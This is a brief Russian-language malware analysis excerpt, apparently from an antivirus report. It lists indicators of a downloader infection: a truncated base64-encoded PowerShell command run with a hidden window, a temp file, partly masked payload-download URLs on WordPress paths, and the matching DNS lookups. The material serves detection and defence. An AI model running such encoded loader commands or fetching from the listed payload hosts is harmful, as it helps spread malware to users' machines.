Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAFIAVABHAEsAZwBvAHcAPQAnAEsASwBVAE8AVgBuAHoAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAYABSAEkAVABZAGAAUABSAE8AVABgAG8AYwBgAE8AbAAiAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1064878.cvr
- http://www.so####techno.com/wp-includes/pl0_sux_k2b4cgyr/
- http://so####techno.com/wp-includes/pl0_sux_k2b4cgyr/
- http://ha##.net/wp-includes/o5kn_2i_4qtj9wg/
- http://www.ta###tasas.com/web/o9kb_qb_na7usf6/
- http://gr####xmedia.com/clients/6whg9_9ww91_ev4kr/
- http://gu##3.com/newsletter/z3a_r_rm70xlsb3/
- DNS ASK so####techno.com
- DNS ASK ha##.net
- DNS ASK ta###tasas.com
- DNS ASK gr####xmedia.com
- DNS ASK gu##3.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAFIAVABHAEsAZwBvAHcAPQAnAEsASwBVAE8AVgBuAHoAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAYABSAEkAVABZAGAAUABSAE8AVABgAG8AYwBgAE8AbAAiAC...' (со скрытым окном)